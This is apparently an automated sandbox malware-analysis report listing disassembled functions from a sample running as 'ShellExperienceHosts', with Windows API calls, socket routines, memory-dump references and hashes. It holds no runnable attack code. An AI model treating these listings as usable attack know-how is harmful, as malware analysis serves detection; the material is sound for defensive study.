                                                                            • Opcode ID: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                            • Instruction ID: 4b24d02a6ebada58952bd9850e7d83bafc68aeb9978cf5702291cfe2885936af
                                                                            • Opcode Fuzzy Hash: 0eddb7f70435084fad788b00feb35f5cb1569ae860eba9b4df7dc0cd97004f8a
                                                                            • Instruction Fuzzy Hash: 91410971600242DFF320DF68C988B5AB7F5FF48395F068569E54ACB255EB76EC408B81
                                                                            Function 6C70C97B Relevance: 15.1, APIs: 10, Instructions: 106windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70C982
                                                                              • Part of subcall function 6C6E2BB1: __EH_prolog3.LIBCMT ref: 6C6E2BB8
                                                                              • Part of subcall function 6C6E2BB1: GetDC.USER32(00000000), ref: 6C6E2BE4
                                                                            • IsRectEmpty.USER32(?), ref: 6C70C99D
                                                                            • InvertRect.USER32(?,?), ref: 6C70C9B3
                                                                            • SetRectEmpty.USER32(?), ref: 6C70C9C0
                                                                            • GetClientRect.USER32(?,?), ref: 6C70CA04
                                                                            • GetSystemMetrics.USER32(00000015), ref: 6C70CA1F
                                                                            • GetSystemMetrics.USER32(00000015), ref: 6C70CA46
                                                                            • SendMessageW.USER32(?,0000120C,00000000,00000001), ref: 6C70CA87
                                                                            • SendMessageW.USER32(?,0000120C,00000001,00000001), ref: 6C70CAB7
                                                                            • InvertRect.USER32(?,?), ref: 6C70CAC3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$EmptyInvertMessageMetricsSendSystem$ClientH_prolog3H_prolog3_
                                                                            • String ID:
                                                                            • API String ID: 3401445556-0
                                                                            • Opcode ID: 2dee2da76387749a256e8d2f23b9aaf69f23e360d600b58bfcfc21cbc8e72323
                                                                            • Instruction ID: 83bab43faeb15b7cb158dfbefcdfc62c358edbcc665e4ccb98f787cda89f2699
                                                                            • Opcode Fuzzy Hash: 2dee2da76387749a256e8d2f23b9aaf69f23e360d600b58bfcfc21cbc8e72323
                                                                            • Instruction Fuzzy Hash: 57419DB2A10214EFCF15DFA4CA89ADD7BB5FF49709F050178E806AB255DB30AD45CBA0
                                                                            Function 6C7BEDB7 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCapture.USER32 ref: 6C7BEDD2
                                                                            • WindowFromPoint.USER32(?,00000000), ref: 6C7BEDE0
                                                                            • GetActiveWindow.USER32 ref: 6C7BEE01
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6C7BEE1B
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 6C7BEE2B
                                                                            • GetDesktopWindow.USER32 ref: 6C7BEE40
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$ActiveCaptureCurrentDesktopFromPointProcess
                                                                            • String ID:
                                                                            • API String ID: 1298419125-0
                                                                            • Opcode ID: 44974ae49c8d32af5ba57fd2ef66a675679c9cdaa727dd2a52a25b0a3d4e7402
                                                                            • Instruction ID: 79dfe33c7c6958f4a089fc47eca98f2b161f66e4436bb6a2540f3925daaeeeb4
                                                                            • Opcode Fuzzy Hash: 44974ae49c8d32af5ba57fd2ef66a675679c9cdaa727dd2a52a25b0a3d4e7402
                                                                            • Instruction Fuzzy Hash: 96311C31A05129EBEF159FB4CA4865EB7B8BF45349F1045B9F416B7B40DB34A940CBD0
                                                                            Function 6C7C045C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 111timewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 6C7C048C
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(?), ref: 6C7C1623
                                                                              • Part of subcall function 6C7C161A: GetSystemMenu.USER32(?,00000000,?,?,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?), ref: 6C7C1649
                                                                              • Part of subcall function 6C7C161A: SetMenuDefaultItem.USER32(?,0000F060,00000000,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C1671
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C167A
                                                                              • Part of subcall function 6C7C161A: IsZoomed.USER32(?), ref: 6C7C1689
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F000,00000003), ref: 6C7C169D
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F010,00000003), ref: 6C7C16AD
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F030,00000003), ref: 6C7C16BE
                                                                              • Part of subcall function 6C7C161A: EnableMenuItem.USER32(?,0000F030,00000000), ref: 6C7C1703
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C170C
                                                                              • Part of subcall function 6C7C161A: DeleteMenu.USER32(?,0000F120,00000000,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C1730
                                                                              • Part of subcall function 6C7C161A: DeleteMenu.USER32(?,0000F030,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C173C
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C1745
                                                                              • Part of subcall function 6C7C161A: DeleteMenu.USER32(?,0000F020,00000000,00000000,?,?,6C7C04AF,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C1769
                                                                              • Part of subcall function 6C7C161A: GetParent.USER32(00000000), ref: 6C7C1780
                                                                              • Part of subcall function 6C7C1B39: __EH_prolog3.LIBCMT ref: 6C7C1B40
                                                                            • KillTimer.USER32(?,0000EC1A,?,?,?,?,?,6C6F3D7E,?,?,?), ref: 6C7C04BE
                                                                            • GetFocus.USER32 ref: 6C7C054D
                                                                            • SetTimer.USER32(?,0000EC1A,000000C8,00000000), ref: 6C7C0594
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemParent$Enable$Delete$Timer$DefaultFocusH_prolog3KillRectSystemWindowZoomed
                                                                            • String ID: ~=ol
                                                                            • API String ID: 2532734362-544613483
                                                                            • Opcode ID: 9257b71203c9d1a09a925be0265cf0bf83d40853d61d38f5851913bedb1c4353
                                                                            • Instruction ID: c006302e17e731e83cdab81403b45cd5253299ea0a7e171e86a0b2a95acc3a77
                                                                            • Opcode Fuzzy Hash: 9257b71203c9d1a09a925be0265cf0bf83d40853d61d38f5851913bedb1c4353
                                                                            • Instruction Fuzzy Hash: EB31DDF1B0424A9FDF209F78DA58E9E76B1BF0930CF100539E552A3950D7309640CBD2
                                                                            Function 6C7389EE Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 73libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000001), ref: 6C738A14
                                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 6C738A24
                                                                            • EncodePointer.KERNEL32(00000000), ref: 6C738A2D
                                                                            • DecodePointer.KERNEL32(00000000,00000000,00000001), ref: 6C738A3B
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 6C738A63
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeDirectoryEncodeHandleModuleProcSystem
                                                                            • String ID: SetDefaultDllDirectories$\$kernel32.dll
                                                                            • API String ID: 2101061299-3881611067
                                                                            • Opcode ID: 94018c52086938e912e38144f415429bb0c436c6d653ad294817a77a8f782960
                                                                            • Instruction ID: 3fc6b49fb281047313ddc285fb58c2ba1b900f7cb7364ccbc8d5c90ba6c774b6
                                                                            • Opcode Fuzzy Hash: 94018c52086938e912e38144f415429bb0c436c6d653ad294817a77a8f782960
                                                                            • Instruction Fuzzy Hash: A521A771B41329A6CB20DF758E0CBDA37BC7B05398F140977A808D3601E774DA44CB91
                                                                            Function 6C75EE42 Relevance: 13.8, APIs: 9, Instructions: 271filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C75EE49
                                                                            • OleDuplicateData.OLE32(00000000,?,00000000), ref: 6C75EEDA
                                                                            • GlobalLock.KERNEL32(00000000), ref: 6C75EEFC
                                                                            • CopyMetaFileW.GDI32(?,00000000,?,6C815C03,?,00000000,?,?), ref: 6C75EF0A
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 6C75EF18
                                                                            • GlobalFree.KERNEL32(00000000), ref: 6C75EF1F
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 6C75EF2C
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,00000000,00000054,?,6C815C03,?,00000000,?,?), ref: 6C75F0D8
                                                                            • CoTaskMemAlloc.OLE32(?,00000000,00000000,?,00000054,?,6C815C03,?,00000000,?,?), ref: 6C75F12F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Global$CopyFileUnlock$AllocDataDuplicateFreeH_prolog3_LockMetaTask
                                                                            • String ID:
                                                                            • API String ID: 66112031-0
                                                                            • Opcode ID: 910836f44ff6491ba634eeb24d8a9681d83b7a2967a5974bf23775ed8aba5ab8
                                                                            • Instruction ID: 584d219ade5204a72a821a557208a0002aaeaf466b840de3973d60256101e8b1
                                                                            • Opcode Fuzzy Hash: 910836f44ff6491ba634eeb24d8a9681d83b7a2967a5974bf23775ed8aba5ab8
                                                                            • Instruction Fuzzy Hash: 3C9190B1A00515EFDB148F64CE48D2ABBB9FF897487448228F416DBA54DF35EC20CBA1
                                                                            Function 6C708A47 Relevance: 13.7, APIs: 9, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetRectEmpty.USER32(?), ref: 6C708AE1
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C708B3A
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C708B49
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Invalidate$Empty
                                                                            • String ID:
                                                                            • API String ID: 1126320529-0
                                                                            • Opcode ID: d1bd1f21fd47d66fdd015fe635336d3a92d235080eb18c01f8094aa5448d2add
                                                                            • Instruction ID: 2040b8c373be0c59e55830aceeab0060a04152bad6d8ed3eb2b1e0a5fedb8188
                                                                            • Opcode Fuzzy Hash: d1bd1f21fd47d66fdd015fe635336d3a92d235080eb18c01f8094aa5448d2add
                                                                            • Instruction Fuzzy Hash: 317127B1B00619DFCF05CF64C984AAE77B6BF49315F2501BAE812AB251CB71AE41CF90
                                                                            Function 10003500 Relevance: 13.6, APIs: 9, Instructions: 116COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 10003660: CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 10003667
                                                                              • Part of subcall function 10003660: _free.LIBCMT ref: 1000369C
                                                                              • Part of subcall function 10003660: _malloc.LIBCMT ref: 100036D7
                                                                              • Part of subcall function 10003660: _memset.LIBCMT ref: 100036E5
                                                                            • InterlockedIncrement.KERNEL32(1001D990), ref: 10003565
                                                                            • InterlockedIncrement.KERNEL32(1001D990), ref: 10003573
                                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 1000359A
                                                                            • setsockopt.WS2_32(?,0000FFFF,00001002,?,00000004), ref: 100035B3
                                                                            • ResetEvent.KERNEL32(?,?,?,1001D990), ref: 100035EE
                                                                            • SetLastError.KERNEL32(00000000), ref: 10003621
                                                                            • GetLastError.KERNEL32 ref: 10003639
                                                                              • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                              • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                              • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                              • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                              • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                              • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                              • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                            • SetLastError.KERNEL32(00000000), ref: 10003649
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 127459856-0
                                                                            • Opcode ID: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
                                                                            • Instruction ID: 683d4fe1a0db9e8cd201fdded36c2c75d02b426da01d37e97b5f8f569f7a2aba
                                                                            • Opcode Fuzzy Hash: 27567248ad9cb40579700c88c4b0573dbe1feeef2cc9a6d62e2a760125df68bb
                                                                            • Instruction Fuzzy Hash: 8041AFB5600704AFE360EF69CC81B9BB7E8FB48341F50882EE646D7690D7B1F8448B90
                                                                            Function 10004430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ResetEvent.KERNEL32(?), ref: 10004443
                                                                            • ResetEvent.KERNEL32(?), ref: 1000444C
                                                                            • timeGetTime.WINMM ref: 1000444E
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 1000445D
                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 100044AB
                                                                            • ResetEvent.KERNEL32(?), ref: 100044C8
                                                                              • Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                              • Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                              • Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
                                                                              • Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                              • Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
                                                                              • Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                              • Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025
                                                                            • ResetEvent.KERNEL32(?), ref: 100044DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                            • String ID:
                                                                            • API String ID: 542259498-0
                                                                            • Opcode ID: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
                                                                            • Instruction ID: e23a36aee9568f488b14e02ccbdce45cc04d01c91958f2c1d86c028973892dd3
                                                                            • Opcode Fuzzy Hash: f834a32b78aad868db6c3b299e2b280971fbcefdd6bd4d0406109023f8606c47
                                                                            • Instruction Fuzzy Hash: 592173B6640704ABD220EF79DC85B97B3E8FF89751F104A1EF58AC7654DA71F8008BA4
                                                                            Function 6C714F76 Relevance: 13.6, APIs: 9, Instructions: 73COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Cursor$ClientEmptyScreen
                                                                            • String ID:
                                                                            • API String ID: 78079831-0
                                                                            • Opcode ID: 7ca2e2d6228d76b70cf67e42e4f6c8f3ee57d370f6e1b15ab1721cf70f2afa67
                                                                            • Instruction ID: 89e42f069d771b7982e7b91eb9724dd43466f727955413f989157e8ddb570401
                                                                            • Opcode Fuzzy Hash: 7ca2e2d6228d76b70cf67e42e4f6c8f3ee57d370f6e1b15ab1721cf70f2afa67
                                                                            • Instruction Fuzzy Hash: 3A213C72A0520AFFDF519FA0C9489EEBBB8FB0A349F14047DE156D3910E730A945DBA1
                                                                            Function 10004E60 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 10004E79
                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 10004E98
                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 10004EA2
                                                                            • SetLastError.KERNEL32(0000139F), ref: 10004EB9
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 10004EC2
                                                                            • LeaveCriticalSection.KERNEL32(00000002), ref: 10004EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                            • String ID:
                                                                            • API String ID: 4082018349-0
                                                                            • Opcode ID: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
                                                                            • Instruction ID: b6eaa0d5c2d22c0db505b760e803bdb0fa2ef48d94b0f961ed90457994499652
                                                                            • Opcode Fuzzy Hash: 6720494b42b4f7a77260b90f8de04f87c6be7c2df52100a175db74c353f41269
                                                                            • Instruction Fuzzy Hash: 36118272700354DBE320DBB9DC85A6BB3ECFB88392B41063EE645C7550DA72E804CBA5
                                                                            Function 6C7D6F4C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 263COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FillRect.USER32(56010845,?,?), ref: 6C7D6F86
                                                                            • FillRect.USER32(?,?,?), ref: 6C7D6FED
                                                                            • FillRect.USER32(?,?,?), ref: 6C7D7090
                                                                              • Part of subcall function 6C6E1F09: __EH_prolog3.LIBCMT ref: 6C6E1F10
                                                                              • Part of subcall function 6C6E1F09: CreateSolidBrush.GDI32(00000000), ref: 6C6E1F2B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: FillRect$BrushCreateH_prolog3Solid
